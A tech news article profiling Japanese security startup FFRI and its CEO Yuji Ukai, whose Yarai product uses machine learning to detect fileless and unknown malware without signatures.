Machine learning fortifies legacy security methods in detecting advanced threats
Technology focuses on malware that has no signature, doesn’t match patterns
By Byron Acohido, ThirdCertainty
Over the past 10 years or so, machine learning has come to dominate our digital lives.
Commercial entities crunch mountains of data, leveraging “intelligent” mathematical algorithms at a furious pace. Much of this is done as part of the massively profitable endeavor of shaping consumer preferences and behaviors—to a degree unimagined by the best-and-brightest sci-fi authors of just 70 or 80 years ago.
So it’s about time the cybersecurity industry has joined the party. Indeed, a cottage industry is thriving composed of information security companies that are increasingly leveraging machine learning—even featuring it—in network defense systems.
Related article: Machine learning keeps malware from getting in through security cracks
A startup called FFRI Inc., and its intriguing founder and CEO, Yuji Ukai, is a new entrant in this field. FFRI happens to be one of the standouts in the emerging cybersecurity industry in Japan. Ukai arrived at Black Hat Vegas this summer hoping to make a splash with a new anti-malware product, which he refers to as the “Yarai,” developed in the land of the rising sun.
Yarai takes new security tack
Instead of amassing and continually expanding a blacklist of known malware and past-attack patterns, as legacy antivirus suites do, the Yarai uses machine learning to detect intrusions by malware for which there are no known signatures or patterns.
Stopping malicious code known as “fileless” malware, or “non-malware,” is a fast emerging specialty. Fileless malware attacks have no signatures, per se. Instead, they cleverly tap into and make use of existing, authorized applications that exist on the company network. So there is no need to download any malicious files.
“We are just focusing on the heuristic technology and also machine learning technology to detect unknown (malware),” Ukai says.
Ukai, a systems engineer who got his career start at Kodak’s R&D office in Japan, spent four years at eEYE Digital Security in Orange County, California, during the go-go startup days of antivirus companies. He worked alongside Marc Maiffret, the researcher who uncovered the Code Red worm attack.
In 2007, Ukai returned to Japan to scratch his entrepreneurial itch. At the time, Japanese companies seeking cybersecurity solutions had no domestic suppliers to choose from, and Ukai saw an opportunity in his homeland. “It wasn’t a very good time,” he says. “But the reason why I just went back to Japan is that … in Japan, there was no such thing as a software security company.”
After 10 years in business, FFRI now boasts the Japanese government and other large Japanese enterprises as customers.
Japan fertile ground for startup
Creating a cybersecurity firm that stayed a few steps ahead was crucial given the lack of innovation in Japan and Japanese customers’ heavy reliance on imports. “If a new cyber threat were to have happened in Japan, we probably wouldn’t have any solution if we couldn’t import new technology from other countries. That’s why we started the software R&D company in Japan,” he says.
The name of the firm, FFRI, is an abbreviation for Fourteenforty Research Institute, a reference to a difficult jump in snowboarding called a “1440.” The jump includes four full 360-degree rotations.
Ukai himself is an avid snowboarder, having caught the bug as a young adult. He’s proficient enough, he told me, to have pulled off a few dicey aerials, though nothing close to a 1440.
FFRI’s main marketing pitch revolves around the idea that conventional security measures, such as antivirus software, security patch and site filters, aren’t enough. Advanced malware attacks can penetrate through these crucial but often outdated measures, says Pablo Garcia, head of FFRI’s U.S. unit.
Advanced solution to advanced malware
“Our sole focus is advanced malware attacks,” Garcia says. “(Given) the amount of advanced malware that’s hitting organizations today, there really need to be solutions out there that can fortify a network or protect a network in a way that doesn’t require a lot of resources or overhead,” he says.
Timing may be on their side. A series of ransomware attacks, including the WannaCry and Petya attacks, as well as the recent string of high-profile network breaches at Equifax, Deloitte and the U.S. Securities and Exchange Commission, is raising more awareness of cutting-edge attack tactics.
“I mean we’ve really been focusing on those areas for a while,” Garcia says. “The fileless malware has been around for a long time. They’re still occurring. It’s almost like the world is trying to eradicate measles and you still get cases of the measles even though, yes, there are good solutions out there for it.”
Ukai says his product can sit on top of other intrusion-prevention systems to help detect and deter advanced attacks. “It is the biggest difference between just regular classical antivirus software and our technology,” he says. “We have five kinds of different engines to detect malware.”
Japan’s notoriously demanding customers also help FFRI’s operations in the United States, Garcia says. “They focus on those things that, I think, could easily be overlooked,” he says. “We’re pursuing this market with the technology that we’re offering. It’s well ahead of what a lot of people are trying to do right now.”
For a deeper drill down on this discussion, please listen to the accompanying podcast.
More stories related to machine learning:
Organizations use machine learning to ferret out data anomalies
As data multiplies, technology helps tackle more challenging security issues
Machine learning picks up where traditional threat detection ends